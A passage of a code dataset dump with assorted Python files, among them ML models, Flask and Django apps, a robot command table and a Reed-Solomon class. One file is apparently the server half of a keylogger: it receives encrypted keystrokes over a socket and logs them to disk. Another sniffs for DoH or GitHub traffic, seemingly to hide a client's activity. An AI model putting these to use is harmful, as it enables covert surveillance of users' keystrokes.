chainer.functions as F\nfrom chainer.functions.connection import embed_id\nfrom chainer.functions.normalization.batch_normalization import batch_normalization\nfrom chainer.functions.evaluation import accuracy\nimport chainer.links as L\nfrom chainer.training import extensions\n\nfrom spinn.util.chainer_blocks import EmbedChain, LSTMChain, RNNChain\nfrom spinn.util.chainer_blocks import MLP\nfrom spinn.util.chainer_blocks import CrossEntropyClassifier\n\n\nclass SentencePairModel(Chain):\n def __init__(self, model_dim, word_embedding_dim, vocab_size, compose_network,\n seq_length, initial_embeddings, num_classes,\n mlp_dim,\n keep_rate,\n gpu=-1,\n ):\n super(SentencePairModel, self).__init__(\n embed=EmbedChain(word_embedding_dim, vocab_size, initial_embeddings, gpu=gpu),\n x2h_premise=RNNChain(model_dim, word_embedding_dim, vocab_size,\n seq_length, initial_embeddings, gpu=gpu, keep_rate=keep_rate),\n x2h_hypothesis=RNNChain(model_dim, word_embedding_dim, vocab_size,\n seq_length, initial_embeddings, gpu=gpu, keep_rate=keep_rate),\n h2y=MLP(dimensions=[model_dim*2, mlp_dim, mlp_dim/2, num_classes],\n keep_rate=keep_rate, gpu=gpu),\n classifier=CrossEntropyClassifier(gpu),\n )\n self.__gpu = gpu\n self.__mod = cuda.cupy if gpu >= 0 else np\n self.accFun = accuracy.accuracy\n self.keep_rate = keep_rate\n\n def __call__(self, x_batch, y_batch=None, train=True):\n ratio = 1 - self.keep_rate\n\n # x_prem = Variable(self.__mod.array(self.embed(x_batch[:, :, 0:1]), dtype=self.__mod.float32))\n # x_hyp = Variable(self.__mod.array(self.embed(x_batch[:, :, 1:2]), dtype=self.__mod.float32))\n\n x_prem = self.embed(x_batch[:, :, 0:1])\n x_hyp = self.embed(x_batch[:, :, 1:2])\n\n x_prem = Variable(self.__mod.array(x_prem, dtype=self.__mod.float32), volatile=not train)\n x_hyp = Variable(self.__mod.array(x_hyp, dtype=self.__mod.float32), volatile=not train)\n\n h_premise = self.x2h_premise(x_prem, train=train)\n h_hypothesis = self.x2h_hypothesis(x_hyp, train=train)\n h = F.concat([h_premise, h_hypothesis], axis=1)\n\n h = F.dropout(h, ratio, train)\n y = self.h2y(h, train)\n\n y = F.dropout(y, ratio, train)\n accum_loss = self.classifier(y, y_batch, train)\n self.accuracy = self.accFun(y, self.__mod.array(y_batch))\n\n return y, accum_loss\n\nclass RNN(object):\n \"\"\"Plain RNN encoder implementation. Can use any activation function.\n \"\"\"\n\n def __init__(self, model_dim, word_embedding_dim, vocab_size, compose_network,\n seq_length,\n num_classes,\n mlp_dim,\n keep_rate,\n initial_embeddings=None,\n use_sentence_pair=False,\n gpu=-1,\n **kwargs):\n \"\"\"Construct an RNN.\n\n Args:\n model_dim: Dimensionality of hidden state.\n vocab_size: Number of unique tokens in vocabulary.\n compose_network: Blocks-like function which accepts arguments\n `prev_hidden_state, inp, inp_dim, hidden_dim, vs, name` (see e.g. `util.LSTMLayer`).\n X: Theano batch describing input matrix, or `None` (in which case\n this instance will make its own batch variable).\n \"\"\"\n\n self.model_dim = model_dim\n self.word_embedding_dim = word_embedding_dim\n self.mlp_dim = mlp_dim\n self.vocab_size = vocab_size\n self._compose_network = compose_network\n self.initial_embeddings = initial_embeddings\n self.seq_length = seq_length\n self.keep_rate = keep_rate\n self.__gpu = gpu\n self.__mod = cuda.cupy if gpu >= 0 else np\n\n if use_sentence_pair:\n self.model = SentencePairModel(\n model_dim, word_embedding_dim, vocab_size, compose_network,\n seq_length, initial_embeddings, num_classes, mlp_dim,\n keep_rate,\n gpu,\n )\n else:\n raise Exception(\"Not implemented error.\")\n\n self.init_params()\n if gpu >= 0:\n cuda.get_device(gpu).use()\n self.model.to_gpu()\n\n def init_params(self):\n for name, param in self.model.namedparams():\n data = param.data\n print(\"Init: {}:{}\".format(name, data.shape))\n data[:] = np.random.uniform(-0.1, 0.1, data.shape)\n\n def init_optimizer(self, clip, decay, lr=0.001, alpha=0.9, eps=1e-6):\n self.optimizer = optimizers.RMSprop(lr=lr, alpha=alpha, eps=eps)\n self.optimizer.setup(self.model)\n\n # Clip Gradient\n self.optimizer.add_hook(chainer.optimizer.GradientClipping(clip))\n\n # L2 Regularization\n self.optimizer.add_hook(chainer.optimizer.WeightDecay(decay))\n\n def update(self):\n self.optimizer.update()\n\n def forward(self, x_batch, y_batch=None, train=True, predict=False):\n y, loss = self.model(x_batch, y_batch, train=train)\n if predict:\n preds = self.__mod.argmax(y.data, 1).tolist()\n else:\n preds = None\n return y, loss, preds\n\n def save(self, filename):\n chainer.serializers.save_npz(filename, self.model)\n\n @staticmethod\n def load(filename, n_units, gpu):\n self = SentenceModel(n_units, gpu)\n chainer.serializers.load_npz(filename, self.model)\n return self\n","sub_path":"python/spinn/plain_rnn_chainer.py","file_name":"plain_rnn_chainer.py","file_ext":"py","file_size_in_byte":6033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"325493874","text":"### 요청을 받아서 응답만 하는 파일 ###\n\n# flask 기본 구성\n# 1. 모듈 가져오기\nfrom flask import Flask, render_template, request, jsonify\n# from ml import detect_lang\nfrom service.ml import detect_lang\nfrom service.db import selectAreaGps, selectAreaIndex\n\n\n# 2. flask 객체 생성\napp = Flask(__name__) # __name__내가 날 구동할 때 사용\n\n# 3. 라우팅 : 어떤 네트워크 안에서 통신 데이터를 보낼 최적의 경로를 선택하는 과정\n@app.route('/')\ndef home():\n # 기본 지역 정보를 최초 화면 구성시 반영하여 처리\n areas = selectAreaIndex()\n # 구 정보를 gus라는 키값으로 지정하여 렌더링시 전달하겠다\n return render_template('DOM.html', gus = areas, default=2)\n\n\n\n@app.route('/getAreaGps')\ndef getAreaGps():\n # 파라미터 받는부분 (get방식)\n gu_id = request.args.get('gu_id')\n print(gu_id)\n return jsonify(selectAreaGps(gu_id))\n # 데이터 추출\n # tmp = [ {'lat':37.55487682, 'lng':126.9696652}, {'lat':37.55487682, 'lng':126.9696652}, ]\n # json으로 응답\n # 응답 데이터에 html이 없다 => 전문통신, 미들 웨어서버, API서버\n # 무게중심이 client에 쏠려있다 => angularjs(구글), reactjs(페이스북,인스타그램), vue\n # return jsonify(tmp)\n\n# 3-1. 언어감지 처리 \n# GET 방식만 현재 되어 있는데, POST도 지원하겠다\n# 한개의 URL로 여러 메소드를 지원 => restful\n@app.route('/LangTypeDetect', methods=['GET','POST'])\ndef LangTypeDetect():\n if request.method == 'POST':\n # 1. 원문 데이터 획득 (GET,POST 방식으로 전달된 데이터 획득)\n # 인덱싱 기법을 사용하지 않고, 함수로 값을 추출한다\n # 오류 발생 시 에러가 나오지 않고 None으로 리턴되어 처리가능\n oriTxt = request.form.get('ori')\n if not oriTxt:\n return {'code':0, 'lang':'', 'desc':'원문데이터 누락'}\n # 2. 언어 감지\n lang, desc = detect_lang(oriTxt)\n # 2-1. DB에 로그 처리\n # 3. 응답\n return {'code':1, 'lang':lang, 'desc':desc}\n else: # GET : 화면을 보여줌\n return render_template('index.html')\n\n# 4. 서버가동\n# run.py를 실행하면, __name__ => 'start(파일명)' 되므로 밑에 부분은 실행을 하지 않음\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"dum/ml_dl_project/service/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"187837944","text":"from django.shortcuts import render\nfrom .backend import *\nfrom .forms import InputForm\n\n\ndef index(request):\n\t# Genereerib tavalise formi HTML's kui formi ei ole saadetud.\n\tif request.method != \"POST\":\n\t\tform = InputForm()\n\t\treturn render(request, \"website/index.html\", {'form': form})\n\n\telse:\n\n\t\t# Salvestab enda sisse formiga saadetud andmed ja teeb nendest DataFrame.\n\t\ttext = request.POST.get(\"text\")\n\t\tngrams = int(request.POST.get('n_gram'))\n\t\tmaatriks = request.POST.get(\"maatriks\")\n\t\tdf = make_dataframe(text)\n\t\t\n\t\t# Kasutades DataFrame'i loob andmed väljanäitamiseks.\n\t\tcounted_lemmas = count_attribute(df, \"lemmas\") # [['lemma', kogus], ['lemma', kogus]]\n\t\tletter_sequence = get_letter_sequence(df, ngrams) # [['tähejäriend', kogus], ['tähejäriend', kogus]]\n\t\tcounted_basewords_lemmas = get_it_all(df) # [['põhivorm', 'lemma', põhivormikogus], ['põhivorm', 'lemma', põhivormikogus]]\n\n\n\t\t# Genereerib uuesti formi, mida HTML lehele saata.\n\t\tform = InputForm()\n\n\t\tif maatriks == \"Ilma maatriksita\":\n\t\t\treturn render(request, \"website/index.html\", {'form': form, 'lemmas': counted_lemmas, 'letters': letter_sequence,'word_texts': counted_basewords_lemmas})\n\t\telse:\n\t\t\tadjacency_matrix, headers = get_adjandency_matrix(text, ngrams) # Annab välja maatriksi ja maatriksi tulpade pealkirjad.\n\t\t\treturn render(request, \"website/index.html\", {'form': form, 'lemmas': counted_lemmas, 'letters': letter_sequence,'word_texts': counted_basewords_lemmas, 'matrix': adjacency_matrix, 'header': headers})\n\n","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"232736140","text":"# float * speedType[6] = {normalVelFast, stopVelFast, standVelFast, normalVelSlow, stopVelSlow, standVelSlow }\nCMD_LIST = {\n 'dutyCycle': 0x03, #expected parameters: int[1], float32[1]\n 'setDirectionBit': 0x04, #expected parameters: int[1]\n 'removeDirectionBit': 0x05, #expected parameters: int[1]\n 'setMotorVoltage': 0x06, #expected parameters: int[1], float32[1]\n 'setPidParameters': 0x08, #expected parameters: float32[3]\n 'setRotatoinSpeed': 0x09, #expected parameters: float32[4]\n 'switchOnKinematicCalculation': 0xB,\n 'switchOffKinematicCalculation': 0xC, \n 'setMovementSpeed': 0xD, #expected parameters: float32[3]\n 'switchOnTrajectoryRegulator': 0xE,\n 'switchOffTrajectoryRegulator': 0xF,\n 'cleanPointsStack': 0x10,\n 'getStackState': 0x12,\n 'setMovementParameters': 0x15, #expected parameters: float32[5]\n 'setADCPinMode': 0x16, #expected parameters: int[1], int[1]\n 'getADCPinState': 0x17, #expected parameters: int[1]\n 'getAllADCPinsStet': 0x18,\n 'getDigitalPinState': 0x19, #expected parameters: int[1]\n 'getAllDigitalPinState': 0x1a,\n 'setOutputState': 0x1b, #expected parameters: int[1]\n 'getPinMode': 0x1c, #expected parameters: int[1]\n 'setPinModeExit': 0x1d, #expected parameters: int[2]\n 'getDiscretePinState': 0x1e, #expected parameters: int[1]\n 'getAllDiscretePinStates': 0x1f,\n 'setDiscreteOutputState': 0x20, #expected parameters: int[1]\n 'determineCurrentPinMode': 0x21, #expected parameters: int[1]\n 'set12VState': 0x22, #expected parameters: int[1]\n 'switchOffPid': 0x23,\n 'switchOnPid': 0x24,\n 'setCorrectCoordinates': 0x25,\n\n # TODO': laying field side\n # TODO: beginning of the competition sign\n # TODO: implement commands listed below \n #getManipulatorState = 0x26 #changeSuckerState = 0x27 #expected parameters: int[1]\n #uploadPuck = 0x28\n #unloadAllPucks = 0x29 #expected parameters: int[1]\n #changeFishingRodState = 0x30 #expected parameters: int[1]\n #changeFishingLatchState = 0x2A #expected parameters: int[1]\n 'setManipulatorAngle': 0x31, # expected parameter: float[1]\n 'switchOffBelts': 0x33,\n 'startGame': 0x34,\n\n\n\n ## Small Robot\n 'on_sucker':0x3c,\n 'off_sucker':0x3d,\n 'rotate_cylinder_horizonal':0x42,\n 'rotate_cylinder_vertical':0x41,\n 'take_cylinder_inside_l':0x4A,\n 'take_cylinder_inside_r':0x4B,\n 'take_cylinder_outside':0x49,\n 'lift_up':0x44,\n 'store':0x45,\n 'out_cylinders':0x48,\n 'in+store':0x47,\n \n 'cylinder_taken':0x4c,\n \n #'drop':0x48,\n\n ## Big Robot\n\n #ball\n 'right_ball_down':0x64,\n 'right_ball_up':0x65,\n 'right_ball_drop':0x66, #expected parameters: float32[1] (angle)\n 'left_ball_down':0x67,\n 'left_ball_up':0x68,\n 'left_ball_drop':0x69,#expected parameters: float32[1] (angle)\n # cylinders\n 'front_down_cylinder_no':0x6A,\n 'front_up_cylinder_yes':0x6B,\n 'front_drop_cylinder_yes':0x6C,\n 'back_down_cylinder_no':0x6D,\n 'back_up_cylinder_yes':0x6E,\n 'back_drop_cylinder_yes':0x6F,\n 'both_sticks_open':0x70,\n 'both_sticks_close':0x71,\n 'us_sensors':0x75,\n # seesaw\n 'seesaw_hand_down':0x72,\n 'seesaw_hand_up':0x73,\n\n ## General\n 'echo': 0x01, # expected parameters: char[4] = 'ECHO'\n 'setCoordinates': 0x02, # expected parameters: float32[3]\n 'setCoordinates2': 0x99, # expected parameters: float32[3]\n 'go_to_with_corrections': 0x43,# expected parameters: float32[6], int[1]\n 'is_point_was_reached': 0x32, # no parameters, returns 0 or 1\n #'sensors_data': 0x3a, # no parameters, returns integer with first 6 bits sensor data\n 'getCurrentCoordinates': 0x13,\n 'getCurrentSpeed': 0x14,\n 'addPointToStack': 0x11, # expected parameters: float32[3], int[1]\n 'stopAllMotors': 0x40,\n 'start_flag': 0x80,\n 'off_wheels':0x81,\n 'on_wheels':0x82 ,\n\n\n\n ## Sucker commands\n 'on_coolers_suck':0x90,\n 'off_coolers':0x91,\n 'on_coolers_throw':0x92,\n 'on_mixer':0x93,\n 'off_mixer':0x94,\n 'up_front_seasaw':0x95,\n 'down_front_seasaw':0x96,\n 'open_door':0x97,\n 'close_door':0x98,\n 'up_back_seasaw': 0x9c,\n 'down_back_seasaw': 0x9b,\n # face\n 'funny_action_open': 0x77,\n 'funny_action_close': 0x78,\n # sensors\n 'sensors_data': 0x76,\n\n}\n\nREVERSED_CMD_LIST = dict((v,k) for k, v in CMD_LIST.items())\n","sub_path":"NewCommunication/Sucker/cmd_list.py","file_name":"cmd_list.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"587361289","text":"import socket\nimport os\nfrom cryptography.fernet import Fernet\n\ndef escribir(tecla):\n\twith open('resumenteclas.txt','a') as archivo:\n\t\tif(tecla == 'Key.enter'):\n\t\t\tarchivo.write(tecla + os.linesep)\n\t\telse:\n\t\t\tarchivo.write(tecla)\n\t\tprint('tecla:' + tecla)\n\ndef cargar_clave():\n\treturn open(\"clave.key\",\"rb\").read()\n\n\nmi_socket = socket.socket()\nmi_socket.bind(('192.168.0.19',4205))\nmi_socket.listen(3)\nclave = cargar_clave()\nprint(clave)\nf = Fernet(clave)\nprint(\"hola mundo\")\nwhile True:\n\tconexion,addr = mi_socket.accept()\n\tprint(\"nueva conexion:\")\n\tprint(addr)\n\trespuesta = conexion.recv(1024)\n\tmensajedesencriptado = f.decrypt(respuesta)\n\tprint(str(mensajedesencriptado))\n\tescribir(str(mensajedesencriptado))\n","sub_path":"experimento con sockets/felipe/servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"570445102","text":"#Упражнение 1.1.2\r\n\r\nwhile(True):\r\n user_year = input('Введите год для проверки:')\r\n if (user_year == 'q'): break\r\n try:\r\n year = int(user_year)\r\n except ValueError:\r\n print('Некорректный ввод')\r\n continue\r\n if year % 4 == 0 or (year % 100 == 0 and year % 400 == 0) :\r\n print(f'{year} год високосный')\r\n else:\r\n print(f'{year} год невисокосный')\r\n user_cont = input('Хотите продолжить?Введите y(да) или n(нет) ')\r\n if user_cont == 'y':\r\n continue\r\n else: break\r\n \r\n\r\n#Упражнение 1.1.3\r\n \r\nwhile(True):\r\n user_name = input('Введите имя: ')\r\n user_sex = input('Введите пол: ')\r\n user_age = input('Введите возраст: ') \r\n if (user_name == '1' or user_sex == '2' or user_age == 'r'): break\r\n try: \r\n age = int(user_age) \r\n except ValueError:\r\n print('Некорректный ввод')\r\n continue\r\n if user_sex == 'мужской' or user_sex == 'man':\r\n print(f'Его зовут {user_name}. Ему {age} лет.')\r\n else:\r\n print(f'Её зовут {user_name}. Ей {age} лет.')\r\n user_cont = input('Хотите продолжить?Введите y(да) или n(нет) ')\r\n if user_cont == 'y':\r\n continue\r\n else: break\r\n \r\n\r\n#Упражнение 1.1.4\r\n \r\nwhile(True):\r\n user_n = input('Рассчитать факториал числа: ')\r\n if (user_n == 'q'): break\r\n try:\r\n n = int(user_n)\r\n except ValueError:\r\n print('Некорректный ввод')\r\n continue\r\n i = 1\r\n fact = 1\r\n if n == 0 or n == 1:\r\n print(f'Факториал числа {n} равен {fact}')\r\n else:\r\n while i <= n:\r\n fact *= i\r\n i += 1\r\n print(f'Факториал числа {n} равен {fact}')\r\n user_cont = input('Хотите продолжить?Введите y(да) или n(нет) ')\r\n if user_cont == 'y':\r\n continue\r\n else: break\r\n \r\n\r\n#Упражнение 1.1.5\r\n \r\n\"\"\"for n in range(1000, 10000):\r\n num = n\r\n s = str(num)\r\n setarr = set(s)\r\n if len(s) == len(setarr):\r\n print(s)\"\"\"\r\n \r\n \r\n \r\n#Упражнение 1.1.6\r\n \r\nfrom math import sqrt\r\n\r\nwhile(True): \r\n \r\n user_n = input('Введите границу диапазона: ')\r\n if (user_n == 'q'): break\r\n try:\r\n n = int(user_n)\r\n except ValueError:\r\n print('Некорректный ввод')\r\n continue\r\n #i, j = 2, 0\r\n for numb in range(1,n+1):\r\n k = 0\r\n for i in range(2, numb // 2+1):\r\n if numb % i == 0:\r\n k += 1\r\n if k <= 0:\r\n print(numb) \r\n \r\n user_cont = input('Хотите продолжить?Введите y(да) или n(нет) ')\r\n if user_cont == 'y':\r\n continue\r\n else: break\r\n\r\n\r\n#Упражнение 1.2.1 \r\n\r\nwhile(True): \r\n user_name = input('Введите вашу фамилию, имя и отчетсво: ')\r\n if (user_name == '1'): break\r\n try:\r\n full_name = str(user_name)\r\n except ValueError:\r\n print('Некорректный ввод')\r\n continue\r\n name_list = full_name.split()\r\n new_name = name_list[1][0].title() + '.'\r\n new_fathername = name_list[2][0].title() + '.'\r\n new_fullname = name_list[0].title() + ' ' + new_name + new_fathername\r\n print(new_fullname)\r\n\r\n user_cont = input('Хотите продолжить?Введите y(да) или другую клавишу, если нет ')\r\n if user_cont == 'y':\r\n continue\r\n else: break\r\n\r\n\r\n\r\n\r\n#Упражнение 1.2.2\r\n\r\nuser_string = input('Введите любую строку: ')\r\nnum_list = [] \r\nnum = ''\r\nsumm = 0\r\nfor char in user_string:\r\n if char.isdigit():\r\n num = num + char\r\n else:\r\n if num != '':\r\n num_list.append(int(num))\r\n summ = summ + int(num)\r\n num = '' \r\nif num != '':\r\n num_list.append(int(num))\r\nsumm = summ + int(num)\r\n \r\nprint(num_list, f' summa = {summ}')\r\n","sub_path":"Exercise1.py","file_name":"Exercise1.py","file_ext":"py","file_size_in_byte":4313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"1676948","text":"#!/usr/bin/python\n\nimport sys, getopt\nfrom scapy.all import *\n\n#thresholds are number of packets over the poll time that is deemed enough traffic to do our business\nFF_IP_PATH = 'FFcloudflareIPs'\nFFDoH_counter = 0\nFFDoH_threshold = 50\nGIT_IP_PATH = 'GitHubIPs'\nGit_counter = 0\nGit_threshold = 50\nPOLL_TIME = 20\nINTERFACE = \"wlp0s20f3\"\n\ndef test_network():\n \"\"\" Analyze the network for Firefox DoH and Github Traffic \"\"\"\n \"\"\" Returns 1 if Firefox Doh Traffic meets threshold \"\"\"\n \"\"\" Returns 2 if Github traffic meets threshold and DoH traffic did not \"\"\"\n \"\"\" Returns -1 if both thresholds are failed \"\"\"\n bpf = create_bpf_filter(FF_IP_PATH)\n sniff_packets(INTERFACE, bpf, addFFcount)\n if(FFDoH_counter > FFDoH_threshold):\n return(1)\n\n bpf = create_bpf_filter(GIT_IP_PATH)\n sniff_packets(INTERFACE, bpf, addGitcount)\n if(Git_counter > Git_threshold):\n return(2)\n \n return(-1)\n\ndef create_bpf_filter(path):\n \"\"\" Create a bpf filter for a list of IPs from a file \"\"\"\n bpf_filter = \"ip and (\"\n IPs = open(path)\n addresses = IPs.readlines()\n IPs.close()\n for addr in addresses[:-1]:\n bpf_filter = \"%snet %s or \" % (bpf_filter, addr)\n bpf_filter = \"%snet %s)\" % (bpf_filter, addresses[-1])\n return bpf_filter\n\n\ndef sniff_packets(interface, bpf_filter, process):\n \"\"\" Sniff for traffic accoring to the filter \"\"\"\n scapy.all.sniff(iface=interface, filter = bpf_filter, store=False, prn = process, timeout = POLL_TIME)\n \n\ndef addFFcount(pkt):\n global FFDoH_counter\n FFDoH_counter += 1\n #print(\"DoH count: \" + str(FFDoH_counter))\n\ndef addGitcount(pkt):\n global Git_counter\n Git_counter += 1\n #print(\"Git count: \" + str(Git_counter))\n\nif __name__ == \"__main__\":\n print(test_network())","sub_path":"tmp/client/testnetwork.py","file_name":"testnetwork.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"581690332","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright (c) 2010 Andrew Brown \n# Copyright (c) 2015 Stephen Larroque \n# See LICENSE.txt for license terms\n\n# TODO: use set instead of list? or bytearray?\n\nfrom ._compat import _range, _StringIO, _izip\n\nclass Polynomial(object):\n '''Completely general polynomial class.\n \n Polynomial objects are mutable.\n \n Implementation note: while this class is mostly agnostic to the type of\n coefficients used (as long as they support the usual mathematical\n operations), the Polynomial class still assumes the additive identity and\n multiplicative identity are 0 and 1 respectively. If you're doing math over\n some strange field or using non-numbers as coefficients, this class will\n need to be modified.'''\n\n __slots__ = ['length', 'coefficients', 'degree'] # define all properties to save memory (can't add new properties at runtime)\n\n def __init__(self, coefficients=None, keep_zero=False, **sparse):\n '''\n There are three ways to initialize a Polynomial object.\n 1) With a list, tuple, or other iterable, creates a polynomial using\n the items as coefficients in order of decreasing power\n\n 2) With keyword arguments such as for example x3=5, sets the\n coefficient of x^3 to be 5\n\n 3) With no arguments, creates an empty polynomial, equivalent to\n Polynomial([0])\n\n >>> print Polynomial([5, 0, 0, 0, 0, 0])\n 5x^5\n\n >>> print Polynomial(x32=5, x64=8)\n 8x^64 + 5x^32\n\n >>> print Polynomial(x5=5, x9=4, x0=2) \n 4x^9 + 5x^5 + 2\n '''\n if coefficients is not None and sparse:\n raise TypeError(\"Specify coefficients list /or/ keyword terms, not\"\n \" both\")\n if coefficients is not None:\n # Polynomial( [1, 2, 3, ...] )\n #if isinstance(coefficients, tuple): coefficients = list(coefficients)\n # Expunge any leading (unsignificant) 0 coefficients\n if not keep_zero: # for some polynomials we may want to keep all zeros, even the higher insignificant zeros (eg, for the syndrome polynomial, we need to keep all coefficients because the length is a precious info)\n while len(coefficients) > 0 and coefficients[0] == 0:\n coefficients.pop(0)\n if not coefficients:\n coefficients.append(0)\n\n self.coefficients = coefficients\n elif sparse:\n # Polynomial(x32=...)\n powers = list(sparse.keys())\n powers.sort(reverse=1)\n # Not catching possible exceptions from the following line, let\n # them bubble up.\n highest = int(powers[0][1:])\n coefficients = [0] * (highest+1)\n\n for power, coeff in sparse.items():\n power = int(power[1:])\n coefficients[highest - power] = coeff\n\n self.coefficients = coefficients\n else:\n # Polynomial()\n self.coefficients = [0]\n # In any case, compute the degree of the polynomial (=the maximum degree)\n self.length = len(self.coefficients)\n self.degree = self.length-1\n\n def __len__(self):\n '''Returns the number of terms in the polynomial'''\n return self.length\n # return len(self.coefficients)\n\n def get_degree(self, poly=None):\n '''Returns the degree of the polynomial'''\n if not poly:\n return self.degree\n #return len(self.coefficients) - 1\n elif poly and hasattr(\"coefficients\", poly):\n return len(poly.coefficients) - 1\n else:\n while poly and poly[-1] == 0:\n poly.pop() # normalize\n return len(poly)-1\n\n def __add__(self, other):\n diff = len(self) - len(other)\n t1 = [0] * (-diff) + self.coefficients\n t2 = [0] * diff + other.coefficients\n return self.__class__([x+y for x,y in _izip(t1, t2)])\n\n def __neg__(self):\n if self[0].__class__.__name__ == \"GF2int\": # optimization: -GF2int(x) == GF2int(x), so it's useless to do a loop in this case\n return self\n else:\n return self.__class__([-x for x in self.coefficients])\n\n def __sub__(self, other):\n return self + -other\n\n def __mul__(self, other):\n '''Multiply two polynomials (also works over Galois Fields, but it's a general approach). Algebraically, multiplying polynomials over a Galois field is equivalent to convolving vectors containing the polynomials' coefficients, where the convolution operation uses arithmetic over the same Galois field (see Matlab's gfconv()).'''\n terms = [0] * (len(self) + len(other))\n\n #l1 = self.degree\n #l2 = other.degree\n l1l2 = self.degree + other.degree\n for i1, c1 in enumerate(self.coefficients):\n if c1 == 0: # log(0) is undefined, skip (and in addition it's a nice optimization)\n continue\n for i2, c2 in enumerate(other.coefficients):\n if c2 == 0: # log(0) is undefined, skip (and in addition it's a nice optimization)\n continue\n else:\n #terms[-((l1-i1)+(l2-i2))-1] += c1*c2 # old way, but not optimized because we recompute l1+l2 everytime\n terms[ -(l1l2-(i1+i2)+1) ] += c1*c2\n return self.__class__(terms)\n\n def mul_at(self, other, k):\n '''Compute the multiplication between two polynomials only at the specified coefficient (this is a lot cheaper than doing the full polynomial multiplication and then extract only the required coefficient)'''\n if k > (self.degree + other.degree) or k > self.degree: return 0 # optimization: if the required coefficient is above the maximum coefficient of the resulting polynomial, we can already predict that and just return 0\n\n term = 0\n\n for i in _range(min(len(self), len(other))):\n coef1 = self.coefficients[-(k-i+1)]\n coef2 = other.coefficients[-(i+1)]\n if coef1 == 0 or coef2 == 0: continue # log(0) is undefined, skip (and in addition it's a nice optimization)\n term += coef1 * coef2\n return term\n\n def scale(self, scalar):\n '''Multiply a polynomial with a scalar'''\n return self.__class__([self.coefficients[i] * scalar for i in _range(len(self))])\n\n def __floordiv__(self, other):\n return divmod(self, other)[0]\n def __mod__(self, other):\n return divmod(self, other)[1]\n def _fastfloordiv(self, other):\n return self._fastdivmod(other)[0]\n def _fastmod(self, other):\n return self._fastdivmod(other)[1]\n def _gffastfloordiv(self, other):\n return self._gffastdivmod(other)[0]\n def _gffastmod(self, other):\n return self._gffastdivmod(other)[1]\n\n def _fastdivmod(dividend, divisor):\n '''Fast polynomial division by using Extended Synthetic Division (aka Horner's method). Also works with non-monic polynomials.\n A nearly exact same code is explained greatly here: http://research.swtch.com/field and you can also check the Wikipedia article and the Khan Academy video.'''\n # Note: for RS encoding, you should supply divisor = mprime (not m, you need the padded message)\n msg_out = list(dividend) # Copy the dividend\n normalizer = divisor[0] # precomputing for performance\n for i in _range(len(dividend)-(len(divisor)-1)):\n msg_out[i] /= normalizer # for general polynomial division (when polynomials are non-monic), the usual way of using synthetic division is to divide the divisor g(x) with its leading coefficient (call it a). In this implementation, this means:we need to compute: coef = msg_out[i] / gen[0]. For more infos, see http://en.wikipedia.org/wiki/Synthetic_division\n coef = msg_out[i] # precaching\n if coef != 0: # log(0) is undefined, so we need to avoid that case explicitly (and it's also a good optimization)\n for j in _range(1, len(divisor)): # in synthetic division, we always skip the first coefficient of the divisior, because it's only used to normalize the dividend coefficient\n if divisor[j] != 0: # log(0) is undefined so we need to avoid that case\n msg_out[i + j] += -divisor[j] * coef\n\n # The resulting msg_out contains both the quotient and the remainder, the remainder being the size of the divisor (the remainder has necessarily the same degree as the divisor -- not length but degree == length-1 -- since it's what we couldn't divide from the dividend), so we compute the index where this separation is, and return the quotient and remainder.\n separator = -(len(divisor)-1)\n return Polynomial(msg_out[:separator]), Polynomial(msg_out[separator:]) # return quotient, remainder.\n\n def _gffastdivmod(dividend, divisor):\n '''Fast polynomial division by using Extended Synthetic Division and optimized for GF(2^p) computations (so it is not generic, must be used with GF2int).\n Transposed from the reedsolomon library: https://github.com/tomerfiliba/reedsolomon\n BEWARE: it works only for monic divisor polynomial! (which is always the case with Reed-Solomon's generator polynomials)'''\n\n msg_out = list(dividend) # Copy the dividend list and pad with 0 where the ecc bytes will be computed\n for i in _range(len(dividend)-(len(divisor)-1)):\n coef = msg_out[i] # precaching\n if coef != 0: # log(0) is undefined, so we need to avoid that case explicitly (and it's also a good optimization)\n for j in _range(1, len(divisor)): # in synthetic division, we always skip the first coefficient of the divisior, because it's only used to normalize the dividend coefficient (which is here useless since the divisor, the generator polynomial, is always monic)\n #if divisor[j] != 0: # log(0) is undefined so we need to check that, but it slow things down in fact and it's useless in our case (reed-solomon encoding) since we know that all coefficients in the generator are not 0\n msg_out[i + j] ^= divisor[j] * coef # equivalent to the more mathematically correct (but xoring directly is faster): msg_out[i + j] += -divisor[j] * coef\n # Note: we could speed things up a bit if we could inline the table lookups, but the Polynomial class is generic, it doesn't know anything about the underlying fields and their operators. Good OOP design, bad for performances in Python because of function calls and the optimizations we can't do (such as precomputing gf_exp[divisor]). That's what is done in reedsolo lib, this is one of the reasons it is faster.\n\n # The resulting msg_out contains both the quotient and the remainder, the remainder being the size of the divisor (the remainder has necessarily the same degree as the divisor -- not length but degree == length-1 -- since it's what we couldn't divide from the dividend), so we compute the index where this separation is, and return the quotient and remainder.\n separator = -(len(divisor)-1)\n return Polynomial(msg_out[:separator]), Polynomial(msg_out[separator:]) # return quotient, remainder.\n\n def __divmod__(dividend, divisor):\n '''Implementation of the Polynomial Long Division, without recursion. Polynomial Long Division is very similar to a simple division of integers, see purplemath.com. Implementation inspired by the pseudo-code from Rosettacode.org'''\n '''Pseudocode:\n degree(P):\n return the index of the last non-zero element of P;\n if all elements are 0, return -inf\n\n polynomial_long_division(N, D) returns (q, r):\n // N, D, q, r are vectors\n if degree(D) < 0 then error\n if degree(N) >= degree(D) then\n q = 0\n while degree(N) >= degree(D)\n d = D shifted right by (degree(N) - degree(D))\n q[degree(N) - degree(D)] = N(degree(N)) / d(degree(d))\n // by construction, 